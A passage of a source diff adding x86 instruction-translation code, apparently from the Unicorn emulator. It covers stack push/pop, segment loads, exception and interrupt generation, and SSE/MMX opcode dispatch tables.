(TCGv **)s->cpu_T; + + tcg_gen_andi_tl(s, *cpu_T[0], *cpu_T[0], 0xffff); + tcg_gen_st32_tl(s, *cpu_T[0], 
s->cpu_env, + offsetof(CPUX86State,segs[seg_reg].selector)); + tcg_gen_shli_tl(s, *cpu_T[0], *cpu_T[0], 4); + tcg_gen_st_tl(s, *cpu_T[0], s->cpu_env, + offsetof(CPUX86State,segs[seg_reg].base)); +} + +/* move T0 to seg_reg and compute if the CPU state may change. Never + call this function with seg_reg == R_CS */ +static void gen_movl_seg_T0(DisasContext *s, int seg_reg, target_ulong cur_eip) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i32 cpu_tmp2_i32 = tcg_ctx->cpu_tmp2_i32; + TCGv **cpu_T = (TCGv **)tcg_ctx->cpu_T; + + if (s->pe && !s->vm86) { + /* XXX: optimize by finding processor state dynamically */ + gen_update_cc_op(s); + gen_jmp_im(s, cur_eip); + tcg_gen_trunc_tl_i32(tcg_ctx, cpu_tmp2_i32, *cpu_T[0]); + gen_helper_load_seg(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, seg_reg), cpu_tmp2_i32); + /* abort translation because the addseg value may change or + because ss32 may change. For R_SS, translation must always + stop as a special handling must be done to disable hardware + interrupts for the next instruction */ + if (seg_reg == R_SS || (s->code32 && seg_reg < R_FS)) + s->is_jmp = DISAS_TB_JUMP; + } else { + gen_op_movl_seg_T0_vm(tcg_ctx, seg_reg); + if (seg_reg == R_SS) + s->is_jmp = DISAS_TB_JUMP; + } +} + +static inline int svm_is_rep(int prefixes) +{ + return ((prefixes & (PREFIX_REPZ | PREFIX_REPNZ)) ? 
8 : 0); +} + +static inline void +gen_svm_check_intercept_param(DisasContext *s, target_ulong pc_start, + uint32_t type, uint64_t param) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + + /* no SVM activated; fast case */ + if (likely(!(s->flags & HF_SVMI_MASK))) + return; + gen_update_cc_op(s); + gen_jmp_im(s, pc_start - s->cs_base); + gen_helper_svm_check_intercept_param(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, type), + tcg_const_i64(tcg_ctx, param)); +} + +static inline void +gen_svm_check_intercept(DisasContext *s, target_ulong pc_start, uint64_t type) +{ + gen_svm_check_intercept_param(s, pc_start, type, 0); +} + +static inline void gen_stack_update(DisasContext *s, int addend) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + +#ifdef TARGET_X86_64 + if (CODE64(s)) { + gen_op_add_reg_im(tcg_ctx, MO_64, R_ESP, addend); + } else +#endif + if (s->ss32) { + gen_op_add_reg_im(tcg_ctx, MO_32, R_ESP, addend); + } else { + gen_op_add_reg_im(tcg_ctx, MO_16, R_ESP, addend); + } +} + +/* Generate a push. It depends on ss32, addseg and dflag. 
*/ +static void gen_push_v(DisasContext *s, TCGv val) +{ + TCGMemOp a_ot, d_ot = mo_pushpop(s, s->dflag); + int size = 1 << d_ot; + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv cpu_A0 = *(TCGv *)tcg_ctx->cpu_A0; + TCGv cpu_tmp4 = *(TCGv *)tcg_ctx->cpu_tmp4; + TCGv new_esp = cpu_A0; + TCGv **cpu_regs = (TCGv **)tcg_ctx->cpu_regs; + + tcg_gen_subi_tl(tcg_ctx, cpu_A0, *cpu_regs[R_ESP], size); + + if (CODE64(s)) { + a_ot = MO_64; + } else if (s->ss32) { + a_ot = MO_32; + if (s->addseg) { + new_esp = cpu_tmp4; + tcg_gen_mov_tl(tcg_ctx, new_esp, cpu_A0); + gen_op_addl_A0_seg(s, R_SS); + } else { + tcg_gen_ext32u_tl(tcg_ctx, cpu_A0, cpu_A0); + } + } else { + a_ot = MO_16; + new_esp = cpu_tmp4; + tcg_gen_ext16u_tl(tcg_ctx, cpu_A0, cpu_A0); + tcg_gen_mov_tl(tcg_ctx, new_esp, cpu_A0); + gen_op_addl_A0_seg(s, R_SS); + } + + gen_op_st_v(s, d_ot, val, cpu_A0); + gen_op_mov_reg_v(tcg_ctx, a_ot, R_ESP, new_esp); +} + +/* two step pop is necessary for precise exceptions */ +static TCGMemOp gen_pop_T0(DisasContext *s) +{ + TCGMemOp d_ot = mo_pushpop(s, s->dflag); + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv cpu_A0 = *(TCGv *)tcg_ctx->cpu_A0; + TCGv **cpu_T = (TCGv **)tcg_ctx->cpu_T; + TCGv addr = cpu_A0; + TCGv **cpu_regs = (TCGv **)tcg_ctx->cpu_regs; + + if (CODE64(s)) { + addr = *cpu_regs[R_ESP]; + } else if (!s->ss32) { + tcg_gen_ext16u_tl(tcg_ctx, cpu_A0, *cpu_regs[R_ESP]); + gen_op_addl_A0_seg(s, R_SS); + } else if (s->addseg) { + tcg_gen_mov_tl(tcg_ctx, cpu_A0, *cpu_regs[R_ESP]); + gen_op_addl_A0_seg(s, R_SS); + } else { + tcg_gen_ext32u_tl(tcg_ctx, cpu_A0, *cpu_regs[R_ESP]); + } + + gen_op_ld_v(s, d_ot, *cpu_T[0], addr); + return d_ot; +} + +static void gen_pop_update(DisasContext *s, TCGMemOp ot) +{ + gen_stack_update(s, 1 << ot); +} + +static void gen_stack_A0(DisasContext *s) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv cpu_A0 = *(TCGv *)tcg_ctx->cpu_A0; + TCGv **cpu_T = (TCGv **)tcg_ctx->cpu_T; + + gen_op_movl_A0_reg(tcg_ctx, R_ESP); + if (!s->ss32) + 
tcg_gen_ext16u_tl(tcg_ctx, cpu_A0, cpu_A0); + tcg_gen_mov_tl(tcg_ctx, *cpu_T[1], cpu_A0); + if (s->addseg) + gen_op_addl_A0_seg(s, R_SS); +} + +/* NOTE: wrap around in 16 bit not fully handled */ +static void gen_pusha(DisasContext *s) +{ + int i; + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv cpu_A0 = *(TCGv *)tcg_ctx->cpu_A0; + TCGv **cpu_T = (TCGv **)tcg_ctx->cpu_T; + + gen_op_movl_A0_reg(tcg_ctx, R_ESP); + gen_op_addl_A0_im(tcg_ctx, ((unsigned int)(-8)) << s->dflag); + if (!s->ss32) + tcg_gen_ext16u_tl(tcg_ctx, cpu_A0, cpu_A0); + tcg_gen_mov_tl(tcg_ctx, *cpu_T[1], cpu_A0); + if (s->addseg) + gen_op_addl_A0_seg(s, R_SS); + for(i = 0;i < 8; i++) { + gen_op_mov_v_reg(tcg_ctx, MO_32, *cpu_T[0], 7 - i); + gen_op_st_v(s, s->dflag, *cpu_T[0], cpu_A0); + gen_op_addl_A0_im(tcg_ctx, 1 << s->dflag); + } + gen_op_mov_reg_v(tcg_ctx, MO_16 + s->ss32, R_ESP, *cpu_T[1]); +} + +/* NOTE: wrap around in 16 bit not fully handled */ +static void gen_popa(DisasContext *s) +{ + int i; + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv cpu_A0 = *(TCGv *)tcg_ctx->cpu_A0; + TCGv **cpu_T = (TCGv **)tcg_ctx->cpu_T; + + gen_op_movl_A0_reg(tcg_ctx, R_ESP); + if (!s->ss32) + tcg_gen_ext16u_tl(tcg_ctx, cpu_A0, cpu_A0); + tcg_gen_mov_tl(tcg_ctx, *cpu_T[1], cpu_A0); + tcg_gen_addi_tl(tcg_ctx, *cpu_T[1], *cpu_T[1], 8 << s->dflag); + if (s->addseg) + gen_op_addl_A0_seg(s, R_SS); + for(i = 0;i < 8; i++) { + /* ESP is not reloaded */ + if (i != 3) { + gen_op_ld_v(s, s->dflag, *cpu_T[0], cpu_A0); + gen_op_mov_reg_v(tcg_ctx, s->dflag, 7 - i, *cpu_T[0]); + } + gen_op_addl_A0_im(tcg_ctx, 1 << s->dflag); + } + gen_op_mov_reg_v(tcg_ctx, MO_16 + s->ss32, R_ESP, *cpu_T[1]); +} + +static void gen_enter(DisasContext *s, int esp_addend, int level) +{ + TCGMemOp ot = mo_pushpop(s, s->dflag); + int opsize = 1 << ot; + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv cpu_A0 = *(TCGv *)tcg_ctx->cpu_A0; + TCGv **cpu_T = (TCGv **)tcg_ctx->cpu_T; + + level &= 0x1f; +#ifdef TARGET_X86_64 + if (CODE64(s)) { + 
gen_op_movl_A0_reg(tcg_ctx, R_ESP); + gen_op_addq_A0_im(tcg_ctx, -opsize); + tcg_gen_mov_tl(tcg_ctx, *cpu_T[1], cpu_A0); + + /* push bp */ + gen_op_mov_v_reg(tcg_ctx, MO_32, *cpu_T[0], R_EBP); + gen_op_st_v(s, ot, *cpu_T[0], cpu_A0); + if (level) { + /* XXX: must save state */ + gen_helper_enter64_level(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, level), + tcg_const_i32(tcg_ctx, (ot == MO_64)), + *cpu_T[1]); + } + gen_op_mov_reg_v(tcg_ctx, ot, R_EBP, *cpu_T[1]); + tcg_gen_addi_tl(tcg_ctx, *cpu_T[1], *cpu_T[1], -esp_addend + (-opsize * level)); + gen_op_mov_reg_v(tcg_ctx, MO_64, R_ESP, *cpu_T[1]); + } else +#endif + { + gen_op_movl_A0_reg(tcg_ctx, R_ESP); + gen_op_addl_A0_im(tcg_ctx, -opsize); + if (!s->ss32) + tcg_gen_ext16u_tl(tcg_ctx, cpu_A0, cpu_A0); + tcg_gen_mov_tl(tcg_ctx, *cpu_T[1], cpu_A0); + if (s->addseg) + gen_op_addl_A0_seg(s, R_SS); + /* push bp */ + gen_op_mov_v_reg(tcg_ctx, MO_32, *cpu_T[0], R_EBP); + gen_op_st_v(s, ot, *cpu_T[0], cpu_A0); + if (level) { + /* XXX: must save state */ + gen_helper_enter_level(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, level), + tcg_const_i32(tcg_ctx, s->dflag - 1), + *cpu_T[1]); + } + gen_op_mov_reg_v(tcg_ctx, ot, R_EBP, *cpu_T[1]); + tcg_gen_addi_tl(tcg_ctx, *cpu_T[1], *cpu_T[1], -esp_addend + (-opsize * level)); + gen_op_mov_reg_v(tcg_ctx, MO_16 + s->ss32, R_ESP, *cpu_T[1]); + } +} + +static void gen_exception(DisasContext *s, int trapno, target_ulong cur_eip) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + + gen_update_cc_op(s); + gen_jmp_im(s, cur_eip); + gen_helper_raise_exception(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, trapno)); + s->is_jmp = DISAS_TB_JUMP; +} + +/* an interrupt is different from an exception because of the + privilege checks */ +static void gen_interrupt(DisasContext *s, int intno, + target_ulong cur_eip, target_ulong next_eip) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + + gen_update_cc_op(s); + // Unicorn: skip to the next instruction after our interrupt callback + 
gen_jmp_im(s, cur_eip); + gen_helper_raise_interrupt(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, intno), + tcg_const_i32(tcg_ctx, next_eip - cur_eip)); + s->is_jmp = DISAS_TB_JUMP; +} + +static void gen_debug(DisasContext *s, target_ulong cur_eip) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + + gen_update_cc_op(s); + gen_jmp_im(s, cur_eip); + gen_helper_debug(tcg_ctx, tcg_ctx->cpu_env); + s->is_jmp = DISAS_TB_JUMP; +} + +/* generate a generic end of block. Trace exception is also generated + if needed */ +static void gen_eob(DisasContext *s) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + + gen_update_cc_op(s); // qq + if (s->tb->flags & HF_INHIBIT_IRQ_MASK) { + gen_helper_reset_inhibit_irq(tcg_ctx, tcg_ctx->cpu_env); + } + if (s->tb->flags & HF_RF_MASK) { + gen_helper_reset_rf(tcg_ctx, tcg_ctx->cpu_env); + } + if (s->singlestep_enabled) { + gen_helper_debug(tcg_ctx, tcg_ctx->cpu_env); + } else if (s->tf) { + gen_helper_single_step(tcg_ctx, tcg_ctx->cpu_env); + } else { + tcg_gen_exit_tb(s->uc->tcg_ctx, 0); + } + s->is_jmp = DISAS_TB_JUMP; +} + +/* generate a jump to eip. 
No segment change must happen before as a + direct call to the next block may occur */ +static void gen_jmp_tb(DisasContext *s, target_ulong eip, int tb_num) +{ + gen_update_cc_op(s); + set_cc_op(s, CC_OP_DYNAMIC); + if (s->jmp_opt) { + gen_goto_tb(s, tb_num, eip); + s->is_jmp = DISAS_TB_JUMP; + } else { + gen_jmp_im(s, eip); + gen_eob(s); + } +} + +static void gen_jmp(DisasContext *s, target_ulong eip) +{ + gen_jmp_tb(s, eip, 0); +} + +static inline void gen_ldq_env_A0(DisasContext *s, int offset) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i64 cpu_tmp1_i64 = tcg_ctx->cpu_tmp1_i64; + TCGv cpu_A0 = *(TCGv *)tcg_ctx->cpu_A0; + + tcg_gen_qemu_ld_i64(s->uc, cpu_tmp1_i64, cpu_A0, s->mem_index, MO_LEQ); + tcg_gen_st_i64(tcg_ctx, cpu_tmp1_i64, tcg_ctx->cpu_env, offset); +} + +static inline void gen_stq_env_A0(DisasContext *s, int offset) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i64 cpu_tmp1_i64 = tcg_ctx->cpu_tmp1_i64; + TCGv cpu_A0 = *(TCGv *)tcg_ctx->cpu_A0; + + tcg_gen_ld_i64(tcg_ctx, cpu_tmp1_i64, tcg_ctx->cpu_env, offset); + tcg_gen_qemu_st_i64(s->uc, cpu_tmp1_i64, cpu_A0, s->mem_index, MO_LEQ); +} + +static inline void gen_ldo_env_A0(DisasContext *s, int offset) +{ + int mem_index = s->mem_index; + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i64 cpu_tmp1_i64 = tcg_ctx->cpu_tmp1_i64; + TCGv cpu_A0 = *(TCGv *)tcg_ctx->cpu_A0; + TCGv cpu_tmp0 = *(TCGv *)tcg_ctx->cpu_tmp0; + + tcg_gen_qemu_ld_i64(s->uc, cpu_tmp1_i64, cpu_A0, mem_index, MO_LEQ); + tcg_gen_st_i64(tcg_ctx, cpu_tmp1_i64, tcg_ctx->cpu_env, offset + offsetof(XMMReg, XMM_Q(0))); + tcg_gen_addi_tl(tcg_ctx, cpu_tmp0, cpu_A0, 8); + tcg_gen_qemu_ld_i64(s->uc, cpu_tmp1_i64, cpu_tmp0, mem_index, MO_LEQ); + tcg_gen_st_i64(tcg_ctx, cpu_tmp1_i64, tcg_ctx->cpu_env, offset + offsetof(XMMReg, XMM_Q(1))); +} + +static inline void gen_sto_env_A0(DisasContext *s, int offset) +{ + int mem_index = s->mem_index; + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i64 cpu_tmp1_i64 = tcg_ctx->cpu_tmp1_i64; + TCGv 
cpu_A0 = *(TCGv *)tcg_ctx->cpu_A0; + TCGv cpu_tmp0 = *(TCGv *)tcg_ctx->cpu_tmp0; + + tcg_gen_ld_i64(tcg_ctx, cpu_tmp1_i64, tcg_ctx->cpu_env, offset + offsetof(XMMReg, XMM_Q(0))); + tcg_gen_qemu_st_i64(s->uc, cpu_tmp1_i64, cpu_A0, mem_index, MO_LEQ); + tcg_gen_addi_tl(tcg_ctx, cpu_tmp0, cpu_A0, 8); + tcg_gen_ld_i64(tcg_ctx, cpu_tmp1_i64, tcg_ctx->cpu_env, offset + offsetof(XMMReg, XMM_Q(1))); + tcg_gen_qemu_st_i64(s->uc, cpu_tmp1_i64, cpu_tmp0, mem_index, MO_LEQ); +} + +static inline void gen_op_movo(TCGContext *s, int d_offset, int s_offset) +{ + TCGv_i64 cpu_tmp1_i64 = s->cpu_tmp1_i64; + + tcg_gen_ld_i64(s, cpu_tmp1_i64, s->cpu_env, s_offset); + tcg_gen_st_i64(s, cpu_tmp1_i64, s->cpu_env, d_offset); + tcg_gen_ld_i64(s, cpu_tmp1_i64, s->cpu_env, s_offset + 8); + tcg_gen_st_i64(s, cpu_tmp1_i64, s->cpu_env, d_offset + 8); +} + +static inline void gen_op_movq(TCGContext *s, int d_offset, int s_offset) +{ + TCGv_i64 cpu_tmp1_i64 = s->cpu_tmp1_i64; + + tcg_gen_ld_i64(s, cpu_tmp1_i64, s->cpu_env, s_offset); + tcg_gen_st_i64(s, cpu_tmp1_i64, s->cpu_env, d_offset); +} + +static inline void gen_op_movl(TCGContext *s, int d_offset, int s_offset) +{ + tcg_gen_ld_i32(s, s->cpu_tmp2_i32, s->cpu_env, s_offset); + tcg_gen_st_i32(s, s->cpu_tmp2_i32, s->cpu_env, d_offset); +} + +static inline void gen_op_movq_env_0(TCGContext *s, int d_offset) +{ + TCGv_i64 cpu_tmp1_i64 = s->cpu_tmp1_i64; + + tcg_gen_movi_i64(s, cpu_tmp1_i64, 0); + tcg_gen_st_i64(s, cpu_tmp1_i64, s->cpu_env, d_offset); +} + +typedef void (*SSEFunc_i_ep)(TCGContext *s, TCGv_i32 val, TCGv_ptr env, TCGv_ptr reg); +typedef void (*SSEFunc_l_ep)(TCGContext *s, TCGv_i64 val, TCGv_ptr env, TCGv_ptr reg); +typedef void (*SSEFunc_0_epi)(TCGContext *s, TCGv_ptr env, TCGv_ptr reg, TCGv_i32 val); +typedef void (*SSEFunc_0_epl)(TCGContext *s, TCGv_ptr env, TCGv_ptr reg, TCGv_i64 val); +typedef void (*SSEFunc_0_epp)(TCGContext *s, TCGv_ptr env, TCGv_ptr reg_a, TCGv_ptr reg_b); +typedef void (*SSEFunc_0_eppi)(TCGContext *s, 
TCGv_ptr env, TCGv_ptr reg_a, TCGv_ptr reg_b, + TCGv_i32 val); +typedef void (*SSEFunc_0_ppi)(TCGContext *s, TCGv_ptr reg_a, TCGv_ptr reg_b, TCGv_i32 val); +typedef void (*SSEFunc_0_eppt)(TCGContext *s, TCGv_ptr env, TCGv_ptr reg_a, TCGv_ptr reg_b, + TCGv val); + +#define SSE_SPECIAL ((void *)1) +#define SSE_DUMMY ((void *)2) + +#define MMX_OP2(x) { gen_helper_ ## x ## _mmx, gen_helper_ ## x ## _xmm } +#define SSE_FOP(x) { gen_helper_ ## x ## ps, gen_helper_ ## x ## pd, \ + gen_helper_ ## x ## ss, gen_helper_ ## x ## sd, } + +static const SSEFunc_0_epp sse_op_table1[256][4] = { + // filler: 0x00 - 0x0e + {0},{0},{0},{0},{0},{0},{0},{0},{0},{0},{0},{0},{0},{0}, + + /* 3DNow! extensions */ + { SSE_DUMMY }, /* femms */ + { SSE_DUMMY }, /* pf. . . */ + + /* pure SSE operations */ + { SSE_SPECIAL, SSE_SPECIAL, SSE_SPECIAL, SSE_SPECIAL }, /* movups, movupd, movss, movsd */ + { SSE_SPECIAL, SSE_SPECIAL, SSE_SPECIAL, SSE_SPECIAL }, /* movups, movupd, movss, movsd */ + { SSE_SPECIAL, SSE_SPECIAL, SSE_SPECIAL, SSE_SPECIAL }, /* movlps, movlpd, movsldup, movddup */ + { SSE_SPECIAL, SSE_SPECIAL }, /* movlps, movlpd */ + { gen_helper_punpckldq_xmm, gen_helper_punpcklqdq_xmm }, + { gen_helper_punpckhdq_xmm, gen_helper_punpckhqdq_xmm }, + { SSE_SPECIAL, SSE_SPECIAL, SSE_SPECIAL }, /* movhps, movhpd, movshdup */ + { SSE_SPECIAL, SSE_SPECIAL }, /* movhps, movhpd */ + + // filler: 0x18 - 0x27 + {0},{0},{0},{0},{0},{0},{0},{0}, {0},{0},{0},{0},{0},{0},{0},{0}, + + /* pure SSE operations */ + { SSE_SPECIAL, SSE_SPECIAL }, /* movaps, movapd */ + { SSE_SPECIAL, SSE_SPECIAL }, /* movaps, movapd */ + { SSE_SPECIAL, SSE_SPECIAL, SSE_SPECIAL, SSE_SPECIAL }, /* cvtpi2ps, cvtpi2pd, cvtsi2ss, cvtsi2sd */ + { SSE_SPECIAL, SSE_SPECIAL, SSE_SPECIAL, SSE_SPECIAL }, /* movntps, movntpd, movntss, movntsd */ + { SSE_SPECIAL, SSE_SPECIAL, SSE_SPECIAL, SSE_SPECIAL }, /* cvttps2pi, cvttpd2pi, cvttsd2si, cvttss2si */ + { SSE_SPECIAL, SSE_SPECIAL, SSE_SPECIAL, SSE_SPECIAL }, /* cvtps2pi, cvtpd2pi, 
cvtsd2si, cvtss2si */ + { gen_helper_ucomiss, gen_helper_ucomisd }, + { gen_helper_comiss, gen_helper_comisd }, + + // filler: 0x30 - 0x37 + {0},{0},{0},{0},{0},{0},{0},{0}, + + /* SSSE3, SSE4, MOVBE, CRC32, BMI1, BMI2, ADX. */ + { SSE_SPECIAL, SSE_SPECIAL, SSE_SPECIAL, SSE_SPECIAL }, + {0}, // filler: 0x39 + { SSE_SPECIAL, SSE_SPECIAL, SSE_SPECIAL, SSE_SPECIAL }, + + // filler: 0x3b - 0x4f + {0},{0},{0},{0},{0}, {0},{0},{0},{0},{0},{0},{0},{0}, {0},{0},{0},{0},{0},{0},{0},{0}, + + /* pure SSE operations */ + { SSE_SPECIAL, SSE_SPECIAL }, /* movmskps, movmskpd */ + SSE_FOP(sqrt), + { gen_helper_rsqrtps, NULL, gen_helper_rsqrtss, NULL }, + { gen_helper_rcpps, NULL, gen_helper_rcpss, NULL }, + { gen_helper_pand_xmm, gen_helper_pand_xmm }, /* andps, andpd */ + { gen_helper_pandn_xmm, gen_helper_pandn_xmm }, /* andnps, andnpd */ + { gen_helper_por_xmm, gen_helper_por_xmm }, /* orps, orpd */ + { gen_helper_pxor_xmm, gen_helper_pxor_xmm }, /* xorps, xorpd */ + SSE_FOP(add), + SSE_FOP(mul), + { gen_helper_cvtps2pd, gen_helper_cvtpd2ps, + gen_helper_cvtss2sd, gen_helper_cvtsd2ss }, + { gen_helper_cvtdq2ps, gen_helper_cvtps2dq, gen_helper_cvttps2dq }, + SSE_FOP(sub), + SSE_FOP(min), + SSE_FOP(div), + SSE_FOP(max), + + /* MMX ops and their SSE extensions */ + MMX_OP2(punpcklbw), + MMX_OP2(punpcklwd), + MMX_OP2(punpckldq), + MMX_OP2(packsswb), + MMX_OP2(pcmpgtb), + MMX_OP2(pcmpgtw), + MMX_OP2(pcmpgtl), + MMX_OP2(packuswb), + MMX_OP2(punpckhbw), + MMX_OP2(punpckhwd), + MMX_OP2(punpckhdq), + MMX_OP2(packssdw), + { NULL, gen_helper_punpcklqdq_xmm }, + { NULL, gen_helper_punpckhqdq_xmm }, + { SSE_SPECIAL, SSE_SPECIAL }, /* movd mm, ea */ + { SSE_SPECIAL, SSE_SPECIAL, SSE_SPECIAL }, /* movq, movdqa, , movqdu */ + { (SSEFunc_0_epp)gen_helper_pshufw_mmx, + (SSEFunc_0_epp)gen_helper_pshufd_xmm, + (SSEFunc_0_epp)gen_helper_pshufhw_xmm, + (SSEFunc_0_epp)gen_helper_pshuflw_xmm }, /* XXX: casts */ + { SSE_SPECIAL, SSE_SPECIAL }, /* shiftw */ + { SSE_SPECIAL, SSE_SPECIAL }, /* shiftd */ + 
{ SSE_SPECIAL, SSE_SPECIAL }, /* shiftq */ + MMX_OP2(pcmpeqb), + MMX_OP2(pcmpeqw), + MMX_OP2(pcmpeql), + { SSE_DUMMY }, /* emms */ + { NULL, SSE_SPECIAL, NULL, SSE_SPECIAL }, /* extrq_i, insertq_i */ + { NULL, gen_helper_extrq_r, NULL, gen_helper_insertq_r }, + {0},{0}, // filler: 0x7a - 0x7b + { NULL, gen_helper_haddpd, NULL, gen_helper_haddps }, + { NULL, gen_helper_hsubpd, NULL, gen_helper_hsubps }, + { SSE_SPECIAL, SSE_SPECIAL, SSE_SPECIAL }, /* movd, movd, , movq */ + { SSE_SPECIAL, SSE_SPECIAL, SSE_SPECIAL }, /* movq, movdqa, movdqu */ + + // filler: 0x80 - 0xc1 + {0},{0},{0},{0},{0},{0},{0},{0}, {0},{0},{0},{0},{0},{0},{0},{0}, + {0},{0},{0},{0},{0},{0},{0},{0}, {0},{0},{0},{0},{0},{0},{0},{0}, + {0},{0},{0},{0},{0},{0},{0},{0}, {0},{0},{0},{0},{0},{0},{0},{0}, + {0},{0},{0},{0},{0},{0},{0},{0}, {0},{0},{0},{0},{0},{0},{0},{0}, + {0},{0}, + + SSE_FOP(cmpeq), + + // filler: 0xc3 + {0}, + + /* MMX ops and their SSE extensions */ + { SSE_SPECIAL, SSE_SPECIAL }, /* pinsrw */ + { SSE_SPECIAL, SSE_SPECIAL }, /* pextrw */ + + { (SSEFunc_0_epp)gen_helper_shufps, + (SSEFunc_0_epp)gen_helper_shufpd }, /* XXX: casts */ + + // filler: 0xc7 - 0xcf + {0}, {0},{0},{0},{0},{0},{0},{0},{0}, + + /* MMX ops and their SSE extensions */ + { NULL, gen_helper_addsubpd, NULL, gen_helper_addsubps }, + MMX_OP2(psrlw), + MMX_OP2(psrld), + MMX_OP2(psrlq), + MMX_OP2(paddq), + MMX_OP2(pmullw), + { NULL, SSE_SPECIAL, SSE_SPECIAL, SSE_SPECIAL }, + { SSE_SPECIAL, SSE_SPECIAL }, /* pmovmskb */ + MMX_OP2(psubusb), + MMX_OP2(psubusw), + MMX_OP2(pminub), + MMX_OP2(pand), + MMX_OP2(paddusb), + MMX_OP2(paddusw), + MMX_OP2(pmaxub), + MMX_OP2(pandn), + MMX_OP2(pavgb), + MMX_OP2(psraw), + MMX_OP2(psrad), + MMX_OP2(pavgw), + MMX_OP2(pmulhuw), + MMX_OP2(pmulhw), + { NULL, gen_helper_cvttpd2dq, gen_helper_cvtdq2pd, gen_helper_cvtpd2dq }, + { SSE_SPECIAL , SSE_SPECIAL }, /* movntq, movntq */ + MMX_OP2(psubsb), + MMX_OP2(psubsw), + MMX_OP2(pminsw), + MMX_OP2(por), + MMX_OP2(paddsb), + MMX_OP2(paddsw), + 
MMX_OP2(pmaxsw), + MMX_OP2(pxor), + { NULL, NULL, NULL, SSE_SPECIAL }, /* lddqu */ + MMX_OP2(psllw), + MMX_OP2(pslld), + MMX_OP2(psllq), + MMX_OP2(pmuludq), + MMX_OP2(pmaddwd), + MMX_OP2(psadbw), + { (SSEFunc_0_epp)gen_helper_maskmov_mmx, + (SSEFunc_0_epp)gen_helper_maskmov_xmm }, /* XXX: casts */ + MMX_OP2(psubb), + MMX_OP2(psubw), + MMX_OP2(psubl), + MMX_OP2(psubq), + MMX_OP2(paddb), + MMX_OP2(paddw), + MMX_OP2(paddl), + + // filler: 0xff + {0}, +}; + +static const SSEFunc_0_epp sse_op_table2[3 * 8][2] = { +#ifdef _MSC_VER + {0},{0}, + MMX_OP2(psrlw), + {0}, + MMX_OP2(psraw), + {0}, + MMX_OP2(psllw), + {0},{0},{0}, + MMX_OP2(psrld), + {0}, + MMX_OP2(psrad), + {0}, + MMX_OP2(pslld), + {0},{0},{0}, + MMX_OP2(psrlq), + { NULL, gen_helper_psrldq_xmm }, + {0},{0}, + MMX_OP2(psllq), + { NULL, gen_helper_pslldq_xmm }, +#else + [0 + 2] = MMX_OP2(psrlw), + [0 + 4] = MMX_OP2(psraw), + [0 + 6] = MMX_OP2(psllw), + [8 + 2] = MMX_OP2(psrld), + [8 + 4] = MMX_OP2(psrad), + [8 + 6] = MMX_OP2(pslld), + [16 + 2] = MMX_OP2(psrlq), + [16 + 3] = { NULL, gen_helper_psrldq_xmm }, + [16 + 6] = MMX_OP2(psllq), + [16 + 7] = { NULL, gen_helper_pslldq_xmm }, +#endif +}; + +static const SSEFunc_0_epi sse_op_table3ai[] = { + gen_helper_cvtsi2ss, + gen_helper_cvtsi2sd +}; + +#ifdef TARGET_X86_64 +static const SSEFunc_0_epl sse_op_table3aq[] = { + gen_helper_cvtsq2ss, + gen_helper_cvtsq2sd +}; +#endif + +static const SSEFunc_i_ep sse_op_table3bi[] = { + gen_helper_cvttss2si, + gen_helper_cvtss2si, + gen_helper_cvttsd2si, + gen_helper_cvtsd2si +}; + +#ifdef TARGET_X86_64 +static const SSEFunc_l_ep sse_op_table3bq[] = { + gen_helper_cvttss2sq, + gen_helper_cvtss2sq, + gen_helper_cvttsd2sq, + gen_helper_cvtsd2sq +}; +#endif + +static const SSEFunc_0_epp sse_op_table4[8][4] = { + SSE_FOP(cmpeq), + SSE_FOP(cmplt), + SSE_FOP(cmple), + SSE_FOP(cmpunord), + SSE_FOP(cmpneq), + SSE_FOP(cmpnlt), + SSE_FOP(cmpnle), + SSE_FOP(cmpord), +}; + +static const SSEFunc_0_epp sse_op_table5[256] = { +#ifdef _MSC_VER 
+ {0},{0},{0},{0},{0},{0},{0},{0}, {0},{0},{0},{0}, // filler: 0x00 - 0x0b + gen_helper_pi2fw, + gen_helper_pi2fd, + {0},{0}, {0},{0},{0},{0},{0},{0},{0},{0}, {0},{0},{0},{0}, // filler: 0x0e - 0x01b + gen_helper_pf2iw, + gen_helper_pf2id, + // filler: 0x1e - 0x89 + {0},{0}, + {0},{0},{0},{0},{0},{0},{0},{0}, {0},{0},{0},{0},{0},{0},{0},{0}, + {0},{0},{0},{0},{0},{0},{0},{0}, {0},{0},{0},{0},{0},{0},{0},{0}, + {0},{0},{0},{0},{0},{0},{0},{0}, {0},{0},{0},{0},{0},{0},{0},{0}, + {0},{0},{0},{0},{0},{0},{0},{0}, {0},{0},{0},{0},{0},{0},{0},{0}, + {0},{0},{0},{0},{0},{0},{0},{0}, {0},{0},{0},{0},{0},{0},{0},{0}, + {0},{0},{0},{0},{0},{0},{0},{0}, {0},{0},{0},{0},{0},{0},{0},{0}, + {0},{0},{0},{0},{0},{0},{0},{0}, {0},{0}, + gen_helper_pfnacc, + {0},{0},{0}, // filler: 0x8b - 0x8d + gen_helper_pfpnacc, + {0}, // filler: 0x8f + gen_helper_pfcmpge, + {0},{0},{0}, // filler: 0x91 - 0x93 + gen_helper_pfmin, + {0}, // filler: 0x95 + gen_helper_pfrcp, + 